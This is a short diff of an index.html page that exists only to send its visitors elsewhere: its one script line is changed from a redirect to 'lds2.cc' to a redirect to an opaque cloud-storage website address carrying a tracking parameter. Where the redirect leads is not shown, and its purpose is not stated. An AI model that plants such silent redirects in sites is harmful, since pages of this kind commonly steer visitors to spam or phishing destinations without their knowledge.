--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
 </head>	
 <body>	
 <script>
-location.href="https://lds2.cc"
+location.href="http://sv-1317141968.cos-website.ap-nanjing.myqcloud.com/?t=NWsn"
 </script>	
 </body>	
 </html>
